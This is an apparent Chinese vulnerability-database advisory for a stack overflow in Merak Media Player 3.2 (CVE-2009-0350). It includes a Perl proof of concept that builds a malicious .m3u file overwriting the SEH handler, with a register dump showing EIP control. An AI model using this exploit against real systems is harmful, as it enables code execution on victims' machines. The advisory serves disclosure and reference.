https://www.exploit-db.com/exploits/7857
https://www.securityfocus.com/bid/33419
https://cxsecurity.com/issue/WLB-2009010249
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-446
Merak Media Player .m3u文件处理栈溢出漏洞
| 漏洞ID | 1117286 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2009-01-25 | 更新时间 | 2009-03-03 |
 CVE编号
|
CVE-2009-0350 |  CNNVD-ID
|
CNNVD-200901-446 |
| 漏洞平台 | Windows | CVSS评分 | 9.3 |
|漏洞来源
|漏洞详情
MerakMediaPlayer中文名为木子播放器,支持多种文件格式。MerakMediaPlayer在处理状态栏图标的ToolTip文本时存在栈溢出漏洞,如果用户受骗打开了特制的播放列表(.m3u)文件就可以触发这个溢出,导致执行任意代码。
|漏洞EXP
#!/usr/bin/perl -w
# Author : Houssamix
# Merak Media Player V3.2 m3u file Local Buffer overflow (SEH)
# Download : http://www.qwerks.com/download/3748/merak.zip
# --------------------------------------------
# EAX 00000000
# ECX 45454545
# EDX 7C9137D8 ntdll.7C9137D8
# EBX 00000000
# ESP 0013F784
# EBP 0013F7A4
# ESI 00000000
# EDI 00000000
# EIP 45454545
# 0013FBE4 42424242 Pointer to next SEH record
# 0013FBE8 45454545 SE handler
# ---------------------------------------------
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Merak Media Player V3.2 m3u file Local Buffer overflow (SEH) \n";
print "===================================================================== \n";
my $buf = "\x42" x 78;
my $seh = "\x45\x45\x45\x45";
my $buff = "\x43" x 1120;
my $file="hsmx.m3u";
$exploit = $buf.$seh.$buff;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";
# milw0rm.com [2009-01-25]|受影响的产品
Qwerks Merak Media Player 3.2
|参考资料
来源:MILW0RM
名称:7857
链接:http://www.milw0rm.com/exploits/7857
来源:SECUNIA
名称:33645
链接:http://secunia.com/advisories/33645
来源:OSVDB
名称:51565
链接:http://osvdb.org/51565
检索漏洞
开始时间
结束时间